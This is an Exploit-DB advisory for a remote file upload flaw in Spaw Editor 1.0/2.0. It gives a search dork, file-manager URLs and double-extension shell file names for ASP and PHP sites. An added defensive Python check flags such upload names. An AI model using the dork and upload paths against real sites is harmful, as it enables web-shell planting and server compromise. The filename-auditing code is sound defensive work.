Spaw Editor 1.0/2.0 - Arbitrary File Upload

EDB-ID: 12672
CVE: N/A
Platform: ASP
Date: 2010-05-20


# Title: Spaw Editor v1.0 & 2.0 Remote File Upload.

# Date....................: [20-05-2010]
# Author..................: [Ma3sTr0-Dz]
# Location ...............: [Algeria]
# Software ...............: [Spaw Editor v1 & v2] 
# Impact..................: [Remote]
# Site Software ..........: [http://www.spaweditor.com]
# Sptnx ..................: [CmOs_Clr & Sec4ever Memberz.]
# Home : .................: [Www.Sec4ever.Com/home/ For Latest 2010 Localz & priv8 Exploits !]
# Contact me : ...........: [o5m@hotmail.de]

# Vulnerability: Remote File Upload .

# Part ExplOit & Bug Codes :

Dork [ allinurl:spaw2/dialogs/ ]

Exploit :

For Windows & ASP Sites : 

/spaw2/dialogs/dialog.aspx?module=spawfm&dialog=spawfm&theme=spaw2&lang=en&charset=utf-8&scid=2d0650b7920a4fbf87598f8d58b4a99b&type=images

/spaw2/uploads/files/sec4ever.asp;.jpg

=====================================

For Linux PHP :

/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=en&charset=utf-8&scid=2d0650b7920a4fbf87598f8d58b4a99b&type=files

/spaw2/uploads/files/sec4ever.jpg.php

=====================================
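
A defender-side check for the two file names above, as an added example that is not part of the original advisory: it audits stored upload names and flags any with a script extension in any segment, a `;` delimiter, or a final extension outside an allowlist. The extension sets and the names `check_upload_name` and `audit_uploads` are assumptions for illustration.

```python
import re

# Assumption: extensions a web server may pass to a script engine.
SCRIPT_EXTS = {"asp", "aspx", "asa", "cer", "php", "php3", "php5",
               "phtml", "phar", "cgi", "pl", "jsp"}
# Assumption: final extensions the file manager is meant to store.
ALLOWED_FINAL = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}


def check_upload_name(name):
    """Return the reasons a stored upload name is unsafe; [] means acceptable."""
    reasons = []
    base = name.replace("\\", "/").rsplit("/", 1)[-1]
    if base != name:
        reasons.append("path separator in name")
    if re.search(r"[;:%\x00-\x1f]", base):
        reasons.append("delimiter or control character in name")
    # Split on '.' and ';' so every extension-like segment is inspected,
    # not only the text after the last dot.
    segments = [s.strip().lower() for s in re.split(r"[.;]", base)]
    stem, exts = segments[0], segments[1:]
    if not stem or not exts:
        reasons.append("missing base name or extension")
    for ext in exts:
        if ext in SCRIPT_EXTS:
            reasons.append("script extension '%s'" % ext)
    if exts and exts[-1] not in ALLOWED_FINAL:
        reasons.append("final extension '%s' not allowed" % exts[-1])
    return reasons


def audit_uploads(names):
    """Map each flagged name to its reasons; clean names are omitted."""
    flagged = {}
    for n in names:
        reasons = check_upload_name(n)
        if reasons:
            flagged[n] = reasons
    return flagged


# Constructed directory listing; the two sec4ever names are the advisory's.
SAMPLE = ["photo.jpg", "report.final.pdf", "sec4ever.asp;.jpg",
          "sec4ever.jpg.php", ".htaccess"]

if __name__ == "__main__":
    for name, why in audit_uploads(SAMPLE).items():
        print(name, "->", "; ".join(why))
```

The same check belongs in the upload handler before the file is written, with the stored name generated server-side rather than taken from the request.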

Special Thanks to : Exploit-db Team & Www.Sec4ever.com/home [ Latest Shellcodez - Security News - Priv8 Exploits & Localz ] .